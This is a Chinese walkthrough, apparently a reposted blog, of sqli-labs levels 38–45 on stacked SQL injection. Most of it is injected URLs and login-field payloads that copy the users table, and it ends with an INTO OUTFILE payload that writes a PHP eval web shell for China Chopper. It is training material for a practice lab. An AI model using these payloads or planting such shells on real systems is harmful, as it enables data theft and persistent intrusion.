标签：38 users create 45 sqli table id select like

less38
Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句（多条）一起执行。

而在真实的运用中也是这样的，我们知道在mysql中，主要是命令行中，每一条语句结尾加 ;表示语句结束。

这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。
我们可以在mysql命令行中进行测试：

Select * from users; create table test1 like users;
Show tables;
Select * from users; drop table test1;
Select * from users; select 1,2,3;

 

 

 

http://192.168.50.100/sqli-labs/Less-38/?id=1'; create table ghz like users ;--+

 

 

 

 

 

http://192.168.50.100/sqli-labs/Less-38/?id=1'; create table ghz like users ;--+ 

 

但其实这样只是复制了表的结构 美哟做到复制表的数据

 

参考链接 ：https://blog.csdn.net/qi95719/article/details/60883148

 

http://192.168.50.100/sqli-labs/Less-38/?id=1';create table ghz38 like users;insert into ghz38 select *from users; --+

 

 

 

 

 

 

 

 

 

less-39

id=1

一样的道理，只是闭合sql语句不同：

 http://192.168.50.100/sqli-labs/Less-39/?id=1;create table ghz39 like users;insert into ghz39 select *from users; --+

 

 

less-40

 id=（‘1’），并且错误不回显

 一样的道理，只是闭合sql语句不同：

 http://192.168.50.100/sqli-labs/Less-40/?id=1‘）;create table ghz40 like users;insert into  ghz40 select *from users; --+

 

less41

？id=1’  并且没有回显信息 也没有错误提示  这就是和39关的区别

 

 

 

 

 

 

id=1，并且错误不回显

一样的道理，只是闭合sql语句不同：

 http://192.168.50.100/sqli-labs/Less-41/?id=1;create table ghz41 like users;insert into ghz41 select *from users; --+

 

less42

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 42

 a';create table ghz42 like users;insert into ghz42 select *from users; #

 

 

 

 

less-43

 

与42关基本一样。区别在：id=（’1‘）

password构造语句：a'）;create table ghz43 like users;insert into ghz43 select *from users; #

 

less-44

与42关基本一样。区别在：没有回显信息    id=’1‘

password构造语句：a';create table ghz44 like users;insert into ghz44 select *from users; #

less-45

与42关基本一样。区别在：没有回显信息  id=（’1‘）

password构造语句：a'）;create table ghz45 like users;insert into ghz45 select *from users; #

 

 

 

另一种方式  使用中国菜刀链接

a’；select  '<?php @eval($_POST[“ghz”]);?>'  into outfile ‘C:\\PhpStudy\\PHPTutorial\\WWW\\sqli-labs\\Less-42\\ghz42.php’ #

 

 

 

 

 

 

 

 

 

 

 

标签：38,users,create,45,sqli,table,id,select,like
来源： https://www.cnblogs.com/xingyuner/p/12254170.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。